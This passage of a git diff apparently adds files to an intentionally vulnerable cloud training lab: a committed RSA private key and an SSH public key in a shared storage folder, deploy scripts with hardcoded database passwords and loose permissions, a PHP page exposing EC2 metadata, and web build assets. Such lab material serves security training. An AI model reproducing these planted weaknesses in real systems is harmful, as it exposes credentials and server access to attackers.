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 +-----END RSA PRIVATE KEY----- diff --git a/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pub b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pub new file mode 100644 index 0000000..db22eff --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/files/.ssh/keys/sophia.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8TbU83Zikoq2dWwKsbbKUqlvSj13zk3l7/pEgEhAMwhbSPvYIq+tLEA7req6LbOGT1rwEkBKuWA3K7iv/juAw33S6IbMKlyuycYvbAuTe3+xSFXpXcCvfxQhJ7qpqMESEXdfvf0/ateUn09K8YwPd4qpFJ/JA+ubBf1hxUDSwXa6j7UBAR83hXbO0tsB9VSDOzaj8kJvdMAt9li78NtTaw1GAtaKOrno1Zx9mgwgK1PXYji1vMQHxpTDcGdUI5hdkNAW7yzdflYQU4+4k25d+HTOVrAxskSN3SKPo0sam/u6z8cbaNucu/WGLzcYXbko/+s7bWfUxQ80jiWLPepBfJiBR7FMtRficwizxv6394ftdZFqnsx4F0QWrvAD3Q+pmBBDFU2Pf22uGurFc4GTe+IohWJQDpVD+WQvQ/PgWQTxoalMBiISxa/QTk/n8/YtFBt4I0n9ICZVU8POJVUz+hgJefjzzeKHTdz1O7LhXglCCss92LEONLYmnTn6+nQU= sophia diff --git a/modules/module-1/resources/storage_account/shared/scripts/deploy_node.sh b/modules/module-1/resources/storage_account/shared/scripts/deploy_node.sh new file mode 100644 index 0000000..448dcb8 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/scripts/deploy_node.sh @@ -0,0 +1,39 @@ +#!/bin/bash + +sudo adduser bob +sudo su - bob +mkdir .ssh +chmod 700 .ssh +touch .ssh/authorized_keys +chmod 600 .ssh/authorized_keys +aws s3 cp s3://BUCKET/keys/bob.pem ./ +cat bob.pem > .ssh/authorized_keys + +sudo yum install -y gcc-c++ make +curl -sL https://rpm.nodesource.com/setup_14.x | sudo -E bash - +sudo yum install -y nodejs + +sudo yum update -y +sudo yum install git -y + +git clone https://github.com/GermaVinsmoke/bmi-calculator.git +cd bmi-calculator +npm install + +npm run build + +sudo su +yum update -y +yum install -y httpd php +systemctl start httpd +systemctl enable httpd +usermod -a -G apache ec2-user +chown -R ec2-user:apache /var/www +chmod 2775 
/var/www +find /var/www -type d -exec chmod 2775 {} \; +find /var/www -type f -exec chmod 0664 {} \; + +cp -r build/* /var/www/html/ +mkdir /var/www/html/bmi-calculator +mv /var/www/html/static /var/www/html/bmi-calculator +systemctl restart httpd.service diff --git a/modules/module-1/resources/storage_account/shared/scripts/php-deploy.sh b/modules/module-1/resources/storage_account/shared/scripts/php-deploy.sh new file mode 100644 index 0000000..02e60f7 --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/scripts/php-deploy.sh @@ -0,0 +1,30 @@ +#!/bin/bash +yum update -y +yum install -y httpd php +systemctl start httpd +systemctl enable httpd +usermod -a -G apache ec2-user +chown -R ec2-user:apache /var/www +chmod 2775 /var/www +find /var/www -type d -exec chmod 2775 {} \; +find /var/www -type f -exec chmod 0664 {} \; +# PHP script to display Instance ID and Availability Zone +cat << 'EOF' > /var/www/html/index.php + + + +
+<h2>EC2 Instance ID: <?php echo file_get_contents('http://169.254.169.254/latest/meta-data/instance-id'); ?></h2> +<h2>Availability Zone: <?php echo file_get_contents('http://169.254.169.254/latest/meta-data/placement/availability-zone'); ?></h2>
+ + +EOF \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/shared/scripts/wordpress_deploy.sh b/modules/module-1/resources/storage_account/shared/scripts/wordpress_deploy.sh new file mode 100644 index 0000000..d35c55b --- /dev/null +++ b/modules/module-1/resources/storage_account/shared/scripts/wordpress_deploy.sh @@ -0,0 +1,87 @@ +#!/bin/bash + +sudo su + +db_root_password=PassWord4-root +db_username=wordpress_user +db_user_password=PassWord4-user +db_name=wordpress_db + + +yum update -y +yum install -y httpd + + +amazon-linux-extras enable php7.4 +yum clean metadata +yum install -y php php-{pear,cgi,common,curl,mbstring,gd,mysqlnd,gettext,bcmath,json,xml,fpm,intl,zip,imap,devel} + +yum -y install gcc ImageMagick ImageMagick-devel ImageMagick-perl +pecl install imagick +chmod 755 /usr/lib64/php/modules/imagick.so +cat <<EOF >>/etc/php.d/20-imagick.ini + +extension=imagick + +EOF + +systemctl restart php-fpm.service + + +yum install -y https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm +yum localinstall -y https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm +rpm --import https://repo.mysql.com/RPM-GPG-KEY-mysql-2022 +yum install -y mysql-community-server + + + +systemctl start httpd +systemctl start mysqld + + +usermod -a -G apache ec2-user +chown -R ec2-user:apache /var/www +find /var/www -type d -exec chmod 2775 {} \; +find /var/www -type f -exec chmod 0664 {} \; + + +wget https://wordpress.org/latest.tar.gz +tar -xzf latest.tar.gz +cp -r wordpress/* /var/www/html/ + + +chown ec2-user:apache /var/log/mysqld.log +temppassword=$(grep 'temporary password' /var/log/mysqld.log | grep -o ".\{12\}$") +chown mysql:mysql /var/log/mysqld.log + + +mysql -p$temppassword --connect-expired-password -e "SET PASSWORD FOR root@localhost = PASSWORD('$db_root_password');FLUSH PRIVILEGES;" +mysql -p"$db_root_password" -e "DELETE FROM mysql.user WHERE User='';" +mysql -p"$db_root_password" -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');" + +mysql -u root -p"$db_root_password" -e "GRANT ALL PRIVILEGES ON *.* TO '$db_username'@'localhost' IDENTIFIED BY '$db_user_password';FLUSH PRIVILEGES;" + +mysql -u $db_username -p"$db_user_password" -e "CREATE DATABASE $db_name;" + +cd /var/www/html +cp wp-config-sample.php wp-config.php + +sed -i "s/database_name_here/$db_name/g" wp-config.php +sed -i "s/username_here/$db_username/g" wp-config.php +sed -i "s/password_here/$db_user_password/g" wp-config.php +cat <<EOF >>/var/www/html/wp-config.php + +define( 'FS_METHOD', 'direct' ); +define('WP_MEMORY_LIMIT', '256M'); +EOF + + +chown -R ec2-user:apache /var/www/html +chmod -R 774 /var/www/html + +sed -i '/<Directory \/var\/www\/>/,/<\/Directory>/ s/AllowOverride None/AllowOverride all/' /etc/httpd/conf/httpd.conf + +systemctl enable httpd.service +systemctl enable mysqld.service +systemctl restart httpd.service \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/asset-manifest.json b/modules/module-1/resources/storage_account/webfiles/build/asset-manifest.json new file mode 100644 index 0000000..0be49ed --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/asset-manifest.json @@ -0,0 +1,25 @@ +{ + "files": { + "main.css": "/static/css/main.e8c9e839.css", + "main.js": "/static/js/main.adc6b28e.js", + "static/js/787.8c65ad62.chunk.js": "/static/js/787.8c65ad62.chunk.js", + "static/media/aws.jpg": "/static/media/aws.7f8d469729dd2de6cfb3.jpg", +
"static/media/aws-wname.jpg": "/static/media/aws-wname.ca2376115332eb5057e8.jpg", + "static/media/full-logo.png": "/static/media/full-logo.d541d93800287b5e76bc.png", + "static/media/azure-logo.png": "/static/media/azure-logo.a6f0fa0f711f4db88a15.png", + "static/media/login.jpg": "/static/media/login.e21739546d37920dcfe5.jpg", + "static/media/AWScloudtitle.jpg": "/static/media/AWScloudtitle.98cddcd1f55ecb7dbf64.jpg", + "static/media/reset-password.jpg": "/static/media/reset-password.534bb9d0d1f845e91b10.jpg", + "static/media/no-posts-found.jpg": "/static/media/no-posts-found.a48ad7ab109b12f96751.jpg", + "static/media/register.jpg": "/static/media/register.4206b16c0ce018f0307d.jpg", + "static/media/logo-title.png": "/static/media/logo-title.75c7c407bd28884bbbf7.png", + "index.html": "/index.html", + "main.e8c9e839.css.map": "/static/css/main.e8c9e839.css.map", + "main.adc6b28e.js.map": "/static/js/main.adc6b28e.js.map", + "787.8c65ad62.chunk.js.map": "/static/js/787.8c65ad62.chunk.js.map" + }, + "entrypoints": [ + "static/css/main.e8c9e839.css", + "static/js/main.adc6b28e.js" + ] +} \ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/favicon/ine.png b/modules/module-1/resources/storage_account/webfiles/build/favicon/ine.png new file mode 100644 index 0000000..6c9997f Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/favicon/ine.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/favicon/logo.png b/modules/module-1/resources/storage_account/webfiles/build/favicon/logo.png new file mode 100644 index 0000000..3a47dd5 Binary files /dev/null and b/modules/module-1/resources/storage_account/webfiles/build/favicon/logo.png differ diff --git a/modules/module-1/resources/storage_account/webfiles/build/index.html b/modules/module-1/resources/storage_account/webfiles/build/index.html new file mode 100644 index 0000000..b0020e9 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/index.html @@ -0,0 +1 @@ +INE
\ No newline at end of file diff --git a/modules/module-1/resources/storage_account/webfiles/build/manifest.json b/modules/module-1/resources/storage_account/webfiles/build/manifest.json new file mode 100644 index 0000000..99cdad1 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/manifest.json @@ -0,0 +1,20 @@ +{ + "short_name": "Minimal App", + "name": "React Material Minimal UI Kit", + "icons": [ + { + "src": "favicon/ine.png", + "sizes": "192x192", + "type": "image/png" + }, + { + "src": "favicon/ine.png", + "sizes": "512x512", + "type": "image/png" + } + ], + "start_url": ".", + "display": "standalone", + "theme_color": "#000000", + "background_color": "#ffffff" +} diff --git a/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css b/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css new file mode 100644 index 0000000..eaa3ff9 --- /dev/null +++ b/modules/module-1/resources/storage_account/webfiles/build/static/css/main.e8c9e839.css @@ -0,0 +1,11 @@ +@import url(https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap);[data-simplebar]{align-content:flex-start;align-items:flex-start;flex-direction:column;flex-wrap:wrap;justify-content:flex-start;position:relative}.simplebar-wrapper{height:inherit;max-height:inherit;max-width:inherit;overflow:hidden;width:inherit}.simplebar-mask{direction:inherit;height:auto!important;overflow:hidden;width:auto!important;z-index:0}.simplebar-mask,.simplebar-offset{bottom:0;left:0;margin:0;padding:0;position:absolute;right:0;top:0}.simplebar-offset{-webkit-overflow-scrolling:touch;box-sizing:inherit!important;direction:inherit!important;resize:none!important}.simplebar-content-wrapper{-ms-overflow-style:none;box-sizing:border-box!important;direction:inherit;display:block;height:100%;max-height:100%;max-width:100%;position:relative;scrollbar-width:none;width:auto}.simplebar-content-wrapper::-webkit-scrollbar,.simplebar-hide-scrollbar::-webkit-scrollbar{height:0;width:0}.simplebar-content:after,.simplebar-content:before{content:" ";display:table}.simplebar-placeholder{max-height:100%;max-width:100%;pointer-events:none;width:100%}.simplebar-height-auto-observer-wrapper{box-sizing:inherit!important;flex-basis:0;flex-grow:inherit;flex-shrink:0;float:left;height:100%;margin:0;max-height:1px;max-width:1px;overflow:hidden;padding:0;pointer-events:none;position:relative;width:100%;z-index:-1}.simplebar-height-auto-observer{box-sizing:inherit;display:block;height:1000%;left:0;min-height:1px;min-width:1px;opacity:0;top:0;width:1000%;z-index:-1}.simplebar-height-auto-observer,.simplebar-track{overflow:hidden;pointer-events:none;position:absolute}.simplebar-track{bottom:0;right:0;z-index:1}[data-simplebar].simplebar-dragging .simplebar-content{pointer-events:none;-ms-user-select:none;user-select:none;-webkit-user-select:none}[data-simplebar].simplebar-dragging .simplebar-track{pointer-events:all}.simplebar-scrollbar{left:0;min-height:10px;position:absolute;right:0}.simplebar-scrollbar:before{background:#000;border-radius:7px;content:"";left:2px;opacity:0;position:absolute;right:2px;transition:opacity .2s linear}.simplebar-scrollbar.simplebar-visible:before{opacity:.5;transition:opacity 0s linear}.simplebar-track.simplebar-vertical{top:0;width:11px}.simplebar-track.simplebar-vertical .simplebar-scrollbar:before{bottom:2px;top:2px}.simplebar-track.simplebar-horizontal{height:11px;left:0}.simplebar-track.simplebar-horizontal 
.simplebar-scrollbar:before{height:100%;left:2px;right:2px}.simplebar-track.simplebar-horizontal .simplebar-scrollbar{height:7px;left:0;min-height:0;min-width:10px;right:auto;top:2px;width:auto}[data-simplebar-direction=rtl] .simplebar-track.simplebar-vertical{left:0;right:auto}.hs-dummy-scrollbar-size{direction:rtl;height:500px;opacity:0;overflow-x:scroll;overflow-y:hidden;position:fixed;visibility:hidden;width:500px}.simplebar-hide-scrollbar{-ms-overflow-style:none;left:0;overflow-y:scroll;position:fixed;scrollbar-width:none;visibility:hidden} + +/*! + * Quill Editor v1.3.7 + * https://quilljs.com/ + * Copyright (c) 2014, Jason Chen + * Copyright (c) 2013, salesforce.com + */.ql-container{box-sizing:border-box;font-family:Helvetica,Arial,sans-serif;font-size:13px;height:100%;margin:0;position:relative}.ql-container.ql-disabled .ql-tooltip{visibility:hidden}.ql-container.ql-disabled .ql-editor ul[data-checked]>li:before{pointer-events:none}.ql-clipboard{height:1px;left:-100000px;overflow-y:hidden;position:absolute;top:50%}.ql-clipboard p{margin:0;padding:0}.ql-editor{word-wrap:break-word;box-sizing:border-box;height:100%;line-height:1.42;outline:none;overflow-y:auto;padding:12px 15px;tab-size:4;-moz-tab-size:4;text-align:left;white-space:pre-wrap}.ql-editor>*{cursor:text}.ql-editor blockquote,.ql-editor h1,.ql-editor h2,.ql-editor h3,.ql-editor h4,.ql-editor h5,.ql-editor h6,.ql-editor ol,.ql-editor p,.ql-editor pre,.ql-editor ul{counter-reset:list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;margin:0;padding:0}.ql-editor ol,.ql-editor ul{padding-left:1.5em}.ql-editor ol>li,.ql-editor ul>li{list-style-type:none}.ql-editor ul>li:before{content:"\2022"}.ql-editor ul[data-checked=false],.ql-editor ul[data-checked=true]{pointer-events:none}.ql-editor ul[data-checked=false]>li *,.ql-editor ul[data-checked=true]>li *{pointer-events:all}.ql-editor ul[data-checked=false]>li:before,.ql-editor ul[data-checked=true]>li:before{color:#777;cursor:pointer;pointer-events:all}.ql-editor ul[data-checked=true]>li:before{content:"\2611"}.ql-editor ul[data-checked=false]>li:before{content:"\2610"}.ql-editor li:before{display:inline-block;white-space:nowrap;width:1.2em}.ql-editor li:not(.ql-direction-rtl):before{margin-left:-1.5em;margin-right:.3em;text-align:right}.ql-editor li.ql-direction-rtl:before{margin-left:.3em;margin-right:-1.5em}.ql-editor ol li:not(.ql-direction-rtl),.ql-editor ul li:not(.ql-direction-rtl){padding-left:1.5em}.ql-editor ol li.ql-direction-rtl,.ql-editor ul li.ql-direction-rtl{padding-right:1.5em}.ql-editor ol li{counter-increment:list-0;counter-reset:list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9}.ql-editor ol li:before{content:counter(list-0,decimal) ". "}.ql-editor ol li.ql-indent-1{counter-increment:list-1}.ql-editor ol li.ql-indent-1:before{content:counter(list-1,lower-alpha) ". "}.ql-editor ol li.ql-indent-1{counter-reset:list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-2{counter-increment:list-2}.ql-editor ol li.ql-indent-2:before{content:counter(list-2,lower-roman) ". "}.ql-editor ol li.ql-indent-2{counter-reset:list-3 list-4 list-5 list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-3{counter-increment:list-3}.ql-editor ol li.ql-indent-3:before{content:counter(list-3,decimal) ". "}.ql-editor ol li.ql-indent-3{counter-reset:list-4 list-5 list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-4{counter-increment:list-4}.ql-editor ol li.ql-indent-4:before{content:counter(list-4,lower-alpha) ". 
"}.ql-editor ol li.ql-indent-4{counter-reset:list-5 list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-5{counter-increment:list-5}.ql-editor ol li.ql-indent-5:before{content:counter(list-5,lower-roman) ". "}.ql-editor ol li.ql-indent-5{counter-reset:list-6 list-7 list-8 list-9}.ql-editor ol li.ql-indent-6{counter-increment:list-6}.ql-editor ol li.ql-indent-6:before{content:counter(list-6,decimal) ". "}.ql-editor ol li.ql-indent-6{counter-reset:list-7 list-8 list-9}.ql-editor ol li.ql-indent-7{counter-increment:list-7}.ql-editor ol li.ql-indent-7:before{content:counter(list-7,lower-alpha) ". "}.ql-editor ol li.ql-indent-7{counter-reset:list-8 list-9}.ql-editor ol li.ql-indent-8{counter-increment:list-8}.ql-editor ol li.ql-indent-8:before{content:counter(list-8,lower-roman) ". "}.ql-editor ol li.ql-indent-8{counter-reset:list-9}.ql-editor ol li.ql-indent-9{counter-increment:list-9}.ql-editor ol li.ql-indent-9:before{content:counter(list-9,decimal) ". "}.ql-editor .ql-indent-1:not(.ql-direction-rtl){padding-left:3em}.ql-editor li.ql-indent-1:not(.ql-direction-rtl){padding-left:4.5em}.ql-editor .ql-indent-1.ql-direction-rtl.ql-align-right{padding-right:3em}.ql-editor li.ql-indent-1.ql-direction-rtl.ql-align-right{padding-right:4.5em}.ql-editor .ql-indent-2:not(.ql-direction-rtl){padding-left:6em}.ql-editor li.ql-indent-2:not(.ql-direction-rtl){padding-left:7.5em}.ql-editor .ql-indent-2.ql-direction-rtl.ql-align-right{padding-right:6em}.ql-editor li.ql-indent-2.ql-direction-rtl.ql-align-right{padding-right:7.5em}.ql-editor .ql-indent-3:not(.ql-direction-rtl){padding-left:9em}.ql-editor li.ql-indent-3:not(.ql-direction-rtl){padding-left:10.5em}.ql-editor .ql-indent-3.ql-direction-rtl.ql-align-right{padding-right:9em}.ql-editor li.ql-indent-3.ql-direction-rtl.ql-align-right{padding-right:10.5em}.ql-editor .ql-indent-4:not(.ql-direction-rtl){padding-left:12em}.ql-editor li.ql-indent-4:not(.ql-direction-rtl){padding-left:13.5em}.ql-editor .ql-indent-4.ql-direction-rtl.ql-align-right{padding-right:12em}.ql-editor li.ql-indent-4.ql-direction-rtl.ql-align-right{padding-right:13.5em}.ql-editor .ql-indent-5:not(.ql-direction-rtl){padding-left:15em}.ql-editor li.ql-indent-5:not(.ql-direction-rtl){padding-left:16.5em}.ql-editor .ql-indent-5.ql-direction-rtl.ql-align-right{padding-right:15em}.ql-editor li.ql-indent-5.ql-direction-rtl.ql-align-right{padding-right:16.5em}.ql-editor .ql-indent-6:not(.ql-direction-rtl){padding-left:18em}.ql-editor li.ql-indent-6:not(.ql-direction-rtl){padding-left:19.5em}.ql-editor .ql-indent-6.ql-direction-rtl.ql-align-right{padding-right:18em}.ql-editor li.ql-indent-6.ql-direction-rtl.ql-align-right{padding-right:19.5em}.ql-editor .ql-indent-7:not(.ql-direction-rtl){padding-left:21em}.ql-editor li.ql-indent-7:not(.ql-direction-rtl){padding-left:22.5em}.ql-editor .ql-indent-7.ql-direction-rtl.ql-align-right{padding-right:21em}.ql-editor li.ql-indent-7.ql-direction-rtl.ql-align-right{padding-right:22.5em}.ql-editor .ql-indent-8:not(.ql-direction-rtl){padding-left:24em}.ql-editor li.ql-indent-8:not(.ql-direction-rtl){padding-left:25.5em}.ql-editor .ql-indent-8.ql-direction-rtl.ql-align-right{padding-right:24em}.ql-editor li.ql-indent-8.ql-direction-rtl.ql-align-right{padding-right:25.5em}.ql-editor .ql-indent-9:not(.ql-direction-rtl){padding-left:27em}.ql-editor li.ql-indent-9:not(.ql-direction-rtl){padding-left:28.5em}.ql-editor .ql-indent-9.ql-direction-rtl.ql-align-right{padding-right:27em}.ql-editor 
li.ql-indent-9.ql-direction-rtl.ql-align-right{padding-right:28.5em}.ql-editor .ql-video{display:block;max-width:100%}.ql-editor .ql-video.ql-align-center{margin:0 auto}.ql-editor .ql-video.ql-align-right{margin:0 0 0 auto}.ql-editor .ql-bg-black{background-color:#000}.ql-editor .ql-bg-red{background-color:#e60000}.ql-editor .ql-bg-orange{background-color:#f90}.ql-editor .ql-bg-yellow{background-color:#ff0}.ql-editor .ql-bg-green{background-color:#008a00}.ql-editor .ql-bg-blue{background-color:#06c}.ql-editor .ql-bg-purple{background-color:#93f}.ql-editor .ql-color-white{color:#fff}.ql-editor .ql-color-red{color:#e60000}.ql-editor .ql-color-orange{color:#f90}.ql-editor .ql-color-yellow{color:#ff0}.ql-editor .ql-color-green{color:#008a00}.ql-editor .ql-color-blue{color:#06c}.ql-editor .ql-color-purple{color:#93f}.ql-editor .ql-font-serif{font-family:Georgia,Times New Roman,serif}.ql-editor .ql-font-monospace{font-family:Monaco,Courier New,monospace}.ql-editor .ql-size-small{font-size:.75em}.ql-editor .ql-size-large{font-size:1.5em}.ql-editor .ql-size-huge{font-size:2.5em}.ql-editor .ql-direction-rtl{direction:rtl;text-align:inherit}.ql-editor .ql-align-center{text-align:center}.ql-editor .ql-align-justify{text-align:justify}.ql-editor .ql-align-right{text-align:right}.ql-editor.ql-blank:before{color:rgba(0,0,0,.6);content:attr(data-placeholder);font-style:italic;left:15px;pointer-events:none;position:absolute;right:15px}.ql-snow .ql-toolbar:after,.ql-snow.ql-toolbar:after{clear:both;content:"";display:table}.ql-snow .ql-toolbar button,.ql-snow.ql-toolbar button{background:none;border:none;cursor:pointer;display:inline-block;float:left;height:24px;padding:3px 5px;width:28px}.ql-snow .ql-toolbar button svg,.ql-snow.ql-toolbar button svg{float:left;height:100%}.ql-snow .ql-toolbar button:active:hover,.ql-snow.ql-toolbar button:active:hover{outline:none}.ql-snow .ql-toolbar input.ql-image[type=file],.ql-snow.ql-toolbar input.ql-image[type=file]{display:none}.ql-snow .ql-toolbar .ql-picker-item.ql-selected,.ql-snow .ql-toolbar .ql-picker-item:hover,.ql-snow .ql-toolbar .ql-picker-label.ql-active,.ql-snow .ql-toolbar .ql-picker-label:hover,.ql-snow .ql-toolbar button.ql-active,.ql-snow .ql-toolbar button:focus,.ql-snow .ql-toolbar button:hover,.ql-snow.ql-toolbar .ql-picker-item.ql-selected,.ql-snow.ql-toolbar .ql-picker-item:hover,.ql-snow.ql-toolbar .ql-picker-label.ql-active,.ql-snow.ql-toolbar .ql-picker-label:hover,.ql-snow.ql-toolbar button.ql-active,.ql-snow.ql-toolbar button:focus,.ql-snow.ql-toolbar button:hover{color:#06c}.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-fill,.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke.ql-fill,.ql-snow .ql-toolbar .ql-picker-item:hover .ql-fill,.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke.ql-fill,.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-fill,.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke.ql-fill,.ql-snow .ql-toolbar .ql-picker-label:hover .ql-fill,.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke.ql-fill,.ql-snow .ql-toolbar button.ql-active .ql-fill,.ql-snow .ql-toolbar button.ql-active .ql-stroke.ql-fill,.ql-snow .ql-toolbar button:focus .ql-fill,.ql-snow .ql-toolbar button:focus .ql-stroke.ql-fill,.ql-snow .ql-toolbar button:hover .ql-fill,.ql-snow .ql-toolbar button:hover .ql-stroke.ql-fill,.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-fill,.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke.ql-fill,.ql-snow.ql-toolbar .ql-picker-item:hover .ql-fill,.ql-snow.ql-toolbar 
.ql-picker-item:hover .ql-stroke.ql-fill,.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-fill,.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke.ql-fill,.ql-snow.ql-toolbar .ql-picker-label:hover .ql-fill,.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke.ql-fill,.ql-snow.ql-toolbar button.ql-active .ql-fill,.ql-snow.ql-toolbar button.ql-active .ql-stroke.ql-fill,.ql-snow.ql-toolbar button:focus .ql-fill,.ql-snow.ql-toolbar button:focus .ql-stroke.ql-fill,.ql-snow.ql-toolbar button:hover .ql-fill,.ql-snow.ql-toolbar button:hover .ql-stroke.ql-fill{fill:#06c}.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke,.ql-snow .ql-toolbar .ql-picker-item.ql-selected .ql-stroke-miter,.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke,.ql-snow .ql-toolbar .ql-picker-item:hover .ql-stroke-miter,.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke,.ql-snow .ql-toolbar .ql-picker-label.ql-active .ql-stroke-miter,.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke,.ql-snow .ql-toolbar .ql-picker-label:hover .ql-stroke-miter,.ql-snow .ql-toolbar button.ql-active .ql-stroke,.ql-snow .ql-toolbar button.ql-active .ql-stroke-miter,.ql-snow .ql-toolbar button:focus .ql-stroke,.ql-snow .ql-toolbar button:focus .ql-stroke-miter,.ql-snow .ql-toolbar button:hover .ql-stroke,.ql-snow .ql-toolbar button:hover .ql-stroke-miter,.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke,.ql-snow.ql-toolbar .ql-picker-item.ql-selected .ql-stroke-miter,.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke,.ql-snow.ql-toolbar .ql-picker-item:hover .ql-stroke-miter,.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke,.ql-snow.ql-toolbar .ql-picker-label.ql-active .ql-stroke-miter,.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke,.ql-snow.ql-toolbar .ql-picker-label:hover .ql-stroke-miter,.ql-snow.ql-toolbar button.ql-active .ql-stroke,.ql-snow.ql-toolbar button.ql-active .ql-stroke-miter,.ql-snow.ql-toolbar button:focus .ql-stroke,.ql-snow.ql-toolbar button:focus .ql-stroke-miter,.ql-snow.ql-toolbar button:hover .ql-stroke,.ql-snow.ql-toolbar button:hover 